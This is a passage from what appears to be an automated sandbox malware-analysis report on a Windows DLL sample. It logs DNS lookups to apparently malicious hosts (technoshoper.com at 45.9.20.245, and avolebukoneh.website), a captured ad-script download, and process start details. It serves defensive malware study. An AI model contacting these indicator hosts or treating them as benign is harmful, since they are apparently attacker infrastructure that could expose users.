                                                                                                                                                                                                                              Nov 23, 2021 10:54:07.959935904 CET192.168.2.68.8.8.80x52c4Standard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:15.200695992 CET192.168.2.68.8.8.80xe1deStandard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:15.647783995 CET192.168.2.68.8.8.80xa6e4Standard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:18.801898003 CET192.168.2.68.8.8.80x45eaStandard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:25.476068020 CET192.168.2.68.8.8.80x808bStandard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:36.076216936 CET192.168.2.68.8.8.80x992aStandard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:36.809657097 CET192.168.2.68.8.8.80xb0beStandard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:37.067101002 CET192.168.2.68.8.8.80x9a5bStandard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:40.575599909 CET192.168.2.68.8.8.80x27deStandard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:46.143867016 CET192.168.2.68.8.8.80x6ea8Standard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:47.428843975 CET192.168.2.68.8.8.80xec77Standard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:47.528775930 CET192.168.2.68.8.8.80x758fStandard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:51.183243036 CET192.168.2.68.8.8.80xdd02Standard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:56.538692951 CET192.168.2.68.8.8.80x89c2Standard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.601921082 CET192.168.2.68.8.8.80x34ebStandard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.770467043 CET192.168.2.68.8.8.80xfa5fStandard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.542634010 CET192.168.2.68.8.8.80xa433Standard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:08.000895023 CET192.168.2.68.8.8.80x4166Standard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:08.252931118 CET192.168.2.68.8.8.80x9a71Standard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:12.061213017 CET192.168.2.68.8.8.80xab20Standard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.446316004 CET192.168.2.68.8.8.80x364aStandard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:28.780441046 CET192.168.2.68.8.8.80x3eb5Standard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.643714905 CET192.168.2.68.8.8.80xb825Standard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.182122946 CET192.168.2.68.8.8.80x932dStandard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.765352011 CET192.168.2.68.8.8.80xe690Standard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:38.797801018 CET192.168.2.68.8.8.80x74dbStandard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:39.938874960 CET192.168.2.68.8.8.80x114dStandard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:40.500597954 CET192.168.2.68.8.8.80xfb82Standard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:44.059487104 CET192.168.2.68.8.8.80x7e9eStandard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)

                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                              Nov 23, 2021 10:51:36.780513048 CET8.8.8.8192.168.2.60x2273No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:51:42.662647963 CET8.8.8.8192.168.2.60xb094No error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:51:43.664618015 CET8.8.8.8192.168.2.60xd93aNo error (0)contextual.media.net2.18.160.23A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:51:49.626315117 CET8.8.8.8192.168.2.60xcbe0No error (0)lg3.media.net2.18.160.23A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:51:50.203742981 CET8.8.8.8192.168.2.60x5b22No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:51:53.231761932 CET8.8.8.8192.168.2.60x37cfNo error (0)hblg.media.net2.18.160.23A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:51:59.341965914 CET8.8.8.8192.168.2.60xc8e4No error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:52:20.920825005 CET8.8.8.8192.168.2.60xf03bNo error (0)btloader.com104.26.7.139A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:52:20.920825005 CET8.8.8.8192.168.2.60xf03bNo error (0)btloader.com172.67.70.134A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:52:20.920825005 CET8.8.8.8192.168.2.60xf03bNo error (0)btloader.com104.26.6.139A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:53:43.977089882 CET8.8.8.8192.168.2.60xfcdeNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:53:44.321031094 CET8.8.8.8192.168.2.60x8bb6No error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.348301888 CET8.8.8.8192.168.2.60xa6c6No error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:53:54.408608913 CET8.8.8.8192.168.2.60xf1c2Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:53:54.951196909 CET8.8.8.8192.168.2.60x76e0Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:53:57.780173063 CET8.8.8.8192.168.2.60xd7f5Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.604422092 CET8.8.8.8192.168.2.60xd5e9No error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.202909946 CET8.8.8.8192.168.2.60xa9bdNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:07.980220079 CET8.8.8.8192.168.2.60x52c4No error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:15.225646019 CET8.8.8.8192.168.2.60xe1deName error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:15.668725014 CET8.8.8.8192.168.2.60xa6e4Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:18.823904991 CET8.8.8.8192.168.2.60x45eaName error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:25.496202946 CET8.8.8.8192.168.2.60x808bNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:36.097043991 CET8.8.8.8192.168.2.60x992aName error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:36.829816103 CET8.8.8.8192.168.2.60xb0beNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:37.100219011 CET8.8.8.8192.168.2.60x9a5bNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:40.596667051 CET8.8.8.8192.168.2.60x27deNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:46.166496992 CET8.8.8.8192.168.2.60x6ea8No error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:47.453711987 CET8.8.8.8192.168.2.60xec77Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:47.549573898 CET8.8.8.8192.168.2.60x758fName error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:51.203574896 CET8.8.8.8192.168.2.60xdd02Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:56.558392048 CET8.8.8.8192.168.2.60x89c2Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.621939898 CET8.8.8.8192.168.2.60x34ebNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.791332006 CET8.8.8.8192.168.2.60xfa5fNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.562652111 CET8.8.8.8192.168.2.60xa433No error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:08.021049023 CET8.8.8.8192.168.2.60x4166Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:08.274789095 CET8.8.8.8192.168.2.60x9a71Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:12.081146955 CET8.8.8.8192.168.2.60xab20Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.464086056 CET8.8.8.8192.168.2.60x364aNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:28.800038099 CET8.8.8.8192.168.2.60x3eb5Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.661693096 CET8.8.8.8192.168.2.60xb825No error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.203749895 CET8.8.8.8192.168.2.60x932dNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.785058975 CET8.8.8.8192.168.2.60xe690No error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:38.817606926 CET8.8.8.8192.168.2.60x74dbNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:39.958785057 CET8.8.8.8192.168.2.60x114dName error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:40.519731998 CET8.8.8.8192.168.2.60xfb82Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:44.079997063 CET8.8.8.8192.168.2.60x7e9eName error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)

                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                              • https:
                                                                                                                                                                                                                                • btloader.com

                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              0192.168.2.649823104.26.7.139443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              2021-11-23 09:52:21 UTC0OUTGET /tag?o=6208086025961472&upapi=true HTTP/1.1
                                                                                                                                                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                                                                                                                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Host: btloader.com
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2021-11-23 09:52:21 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Tue, 23 Nov 2021 09:52:21 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Content-Length: 10157
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=1800, must-revalidate
                                                                                                                                                                                                                              Etag: "643eb1aad6ba3932ca744b96ffc00048"
                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 2524
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9tSAb0qJURYPecAhlFR31D6V6y8WmhJzLk8VfHiSNkRpSqrAmbscXgsKaKrnCtvFLCUzBqyaSc4Zf2PiJnHT0KlTY%2BKTDKJYBXZwDIJFJJqAUSxjWMdQXoP31%2FEliw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 6b298113fff92b1e-FRA
                                                                                                                                                                                                                              2021-11-23 09:52:21 UTC1INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 69 2c 63 2c 6c 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 63 3d 63 7c 7c 50 72 6f 6d 69 73 65 29 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 74 72 79 7b 72 28 6c 2e 6e 65 78 74 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 74 72 79 7b 72 28 6c 2e 74 68 72 6f 77 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 76 61 72 20 74 3b 65 2e 64 6f 6e 65 3f 6e 28 65 2e 76 61 6c 75 65 29 3a 28 28 74 3d 65 2e 76 61 6c 75 65 29 69 6e 73 74 61 6e 63 65 6f 66 20 63 3f 74 3a 6e 65 77 20 63 28 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                              Data Ascii: !function(){"use strict";function r(e,i,c,l){return new(c=c||Promise)(function(n,t){function o(e){try{r(l.next(e))}catch(e){t(e)}}function a(e){try{r(l.throw(e))}catch(e){t(e)}}function r(e){var t;e.done?n(e.value):((t=e.value)instanceof c?t:new c(functio
                                                                                                                                                                                                                              2021-11-23 09:52:21 UTC1INData Raw: 6f 6e 28 74 29 7b 69 66 28 61 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 63 3b 29 74 72 79 7b 69 66 28 61 3d 31 2c 72 26 26 28 69 3d 32 26 74 5b 30 5d 3f 72 2e 72 65 74 75 72 6e 3a 74 5b 30 5d 3f 72 2e 74 68 72 6f 77 7c 7c 28 28 69 3d 72 2e 72 65 74 75 72 6e 29 26 26 69 2e 63 61 6c 6c 28 72 29 2c 30 29 3a 72 2e 6e 65 78 74 29 26 26 21 28 69 3d 69 2e 63 61 6c 6c 28 72 2c 74 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 69 3b 73 77 69 74 63 68 28 72 3d 30 2c 69 26 26 28 74 3d 5b 32 26 74 5b 30 5d 2c 69 2e 76 61 6c 75 65 5d 29 2c 74 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 69 3d 74 3b 62 72 65 61
                                                                                                                                                                                                                              Data Ascii: on(t){if(a)throw new TypeError("Generator is already executing.");for(;c;)try{if(a=1,r&&(i=2&t[0]?r.return:t[0]?r.throw||((i=r.return)&&i.call(r),0):r.next)&&!(i=i.call(r,t[1])).done)return i;switch(r=0,i&&(t=[2&t[0],i.value]),t[0]){case 0:case 1:i=t;brea
                                                                                                                                                                                                                              2021-11-23 09:52:21 UTC2INData Raw: 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 29 7d 76 61 72 20 75 2c 61 2c 64 2c 62 2c 6d 3b 75 3d 22 36 32 30 38 30 38 36 30 32 35 39 36 31 34 37 32 22 2c 61 3d 22 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 64 3d 22 61 70 69 2e 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 62 3d 22 32 2e 30 2e 32 2d 32 2d 67 66 64 63 39 30 35 34 22 2c 6d 3d 22 22 3b 76 61 72 20 6f 3d 7b 22 6d 73 6e 2e 63 6f 6d 22 3a 7b 22 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 77 65 62 73 69 74 65 5f 69 64 22 3a 22 35 36 37 31 37 33 37 33 38 38 36 39 35 35 35 32 22 7d 7d 2c 77 3d 7b 74 72 61 63 65 49 44 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 69 66 28 21 65 7c
                                                                                                                                                                                                                              Data Ascii: appendChild(e)})}var u,a,d,b,m;u="6208086025961472",a="btloader.com",d="api.btloader.com",b="2.0.2-2-gfdc9054",m="";var o={"msn.com":{"content_enabled":true,"mobile_content_enabled":false,"website_id":"5671737388695552"}},w={traceID:function(e,t,n){if(!e|
                                                                                                                                                                                                                              2021-11-23 09:52:21 UTC4INData Raw: 62 73 69 74 65 49 44 3d 6f 5b 6e 5d 2e 77 65 62 73 69 74 65 5f 69 64 2c 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 2c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 29 3b 74 7c 7c 28 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 2f 2f 22 2b 64 2b 22 2f 6c 3f 65 76 65 6e 74 3d 75 6e 6b 6e 6f 77 6e 44 6f 6d 61 69 6e 26 6f 72 67 3d 22 2b 75 2b 22 26 64 6f 6d 61 69 6e 3d 22 2b 65 29 7d 28 29 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 74 61 67 5f 64 3d 7b 6f 72 67 49 44 3a 75 2c 64 6f 6d 61 69 6e 3a 61 2c 61 70 69 44 6f 6d 61 69 6e 3a 64 2c 76 65 72 73 69 6f 6e 3a 62 2c 77 65 62 73 69 74 65
                                                                                                                                                                                                                              Data Ascii: bsiteID=o[n].website_id,p.contentEnabled=o[n].content_enabled,p.mobileContentEnabled=o[n].mobile_content_enabled);t||((new Image).src="//"+d+"/l?event=unknownDomain&org="+u+"&domain="+e)}(),window.__bt_tag_d={orgID:u,domain:a,apiDomain:d,version:b,website
                                                                                                                                                                                                                              2021-11-23 09:52:21 UTC5INData Raw: 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 2b 6f 2b 30 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 2b 6f 2b 30 2b 74 29 29 7d 2c 6f 2b 3d 74 7d 29 7d 76 61 72 20 6c 3d 74 5b 30 5d 3b 69 66 28 6e 75 6c 6c 21 3d 6c 26 26 6c 2e 62 75 6e 64 6c 65 73 29 7b 76 61 72 20 73 3d 6f 2c 75 3d 31 2d 6f 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6c 2e 62 75 6e 64 6c 65 73 29 2e 73 6f 72 74 28 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6c 2e 62 75 6e 64 6c 65 73 5b 65 5d 3b 69 5b 65 5d 3d 7b 6d 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 73 2b 75 2a 61 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 73 2b 75 2a 28 61 2b 74 29 29 29 7d 2c 61 2b 3d 74 7d 29 7d 76 61 72 20 64
                                                                                                                                                                                                                              Data Ascii: ath.trunc(100*(+o+0)),max:Math.trunc(100*(+o+0+t))},o+=t})}var l=t[0];if(null!=l&&l.bundles){var s=o,u=1-o;Object.keys(l.bundles).sort().forEach(function(e){var t=l.bundles[e];i[e]={min:Math.trunc(100*(s+u*a)),max:Math.trunc(100*(s+u*(a+t)))},a+=t})}var d
                                                                                                                                                                                                                              2021-11-23 09:52:21 UTC7INData Raw: 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 3b 61 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 74 2c 6e 2e 62 75 62 62 6c 65 73 2c 6e 2e 63 61 6e 63 65 6c 61 62 6c 65 2c 6e 2e 64 65 74 61 69 6c 29 2c 77 69 6e 64 6f 77 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 61 29 7d 66 3d 7b 7d 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 69 6e 74 72 6e 6c 3d 7b 74 72 61 63 65 49 44 3a 77 2e 74 72 61 63 65 49 44 7d 3b 74 72 79 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 72 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 6e 2c 6f 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 77 69 74 63 68 28 65 2e 6c 61
                                                                                                                                                                                                                              Data Ascii: a=document.createEvent("CustomEvent");a.initCustomEvent(t,n.bubbles,n.cancelable,n.detail),window.dispatchEvent(a)}f={},window.__bt_intrnl={traceID:w.traceID};try{!function(){r(this,void 0,void 0,function(){var t,n,o;return i(this,function(e){switch(e.la
                                                                                                                                                                                                                              2021-11-23 09:52:21 UTC8INData Raw: 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 22 74 72 75 65 22 3d 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 66 6f 72 63 65 4d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 22 29 7c 7c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 29 2c 70 2e 77 65 62 73 69 74 65 49 44 26 26 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 26 26 28 21 28 6e 3d 2f 28 61 6e 64 72 6f 69 64 7c 62 62 5c 64 2b 7c 6d 65 65 67 6f 29 2e 2b 6d 6f 62 69 6c 65 7c 61 76 61 6e 74 67 6f 7c 62 61 64 61 5c 2f 7c 62 6c 61 63 6b 62 65 72 72 79 7c 62 6c 61 7a 65 72 7c 63 6f 6d 70 61 6c 7c 65 6c 61 69 6e 65 7c 66 65 6e 6e 65 63 7c 68 69 70 74 6f 70 7c 69 65 6d 6f 62 69 6c 65 7c 69 70 28 68 6f 6e 65 7c 6f 64 29 7c 69 72 69 73 7c 6b 69 6e 64 6c 65 7c 6c 67 65
                                                                                                                                                                                                                              Data Ascii: ContentEnabled="true"==localStorage.getItem("forceMobileContent")||p.mobileContentEnabled),p.websiteID&&p.contentEnabled&&(!(n=/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge
                                                                                                                                                                                                                              2021-11-23 09:52:21 UTC9INData Raw: 76 29 7c 7a 7a 29 7c 6d 74 28 35 30 7c 70 31 7c 76 20 29 7c 6d 77 62 70 7c 6d 79 77 61 7c 6e 31 30 5b 30 2d 32 5d 7c 6e 32 30 5b 32 2d 33 5d 7c 6e 33 30 28 30 7c 32 29 7c 6e 35 30 28 30 7c 32 7c 35 29 7c 6e 37 28 30 28 30 7c 31 29 7c 31 30 29 7c 6e 65 28 28 63 7c 6d 29 5c 2d 7c 6f 6e 7c 74 66 7c 77 66 7c 77 67 7c 77 74 29 7c 6e 6f 6b 28 36 7c 69 29 7c 6e 7a 70 68 7c 6f 32 69 6d 7c 6f 70 28 74 69 7c 77 76 29 7c 6f 72 61 6e 7c 6f 77 67 31 7c 70 38 30 30 7c 70 61 6e 28 61 7c 64 7c 74 29 7c 70 64 78 67 7c 70 67 28 31 33 7c 5c 2d 28 5b 31 2d 38 5d 7c 63 29 29 7c 70 68 69 6c 7c 70 69 72 65 7c 70 6c 28 61 79 7c 75 63 29 7c 70 6e 5c 2d 32 7c 70 6f 28 63 6b 7c 72 74 7c 73 65 29 7c 70 72 6f 78 7c 70 73 69 6f 7c 70 74 5c 2d 67 7c 71 61 5c 2d 61 7c 71 63 28 30 37 7c
                                                                                                                                                                                                                              Data Ascii: v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|


                                                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                              Analysis Process: loaddll32.exe PID: 6980 Parent PID: 1868

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:28
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:loaddll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll"
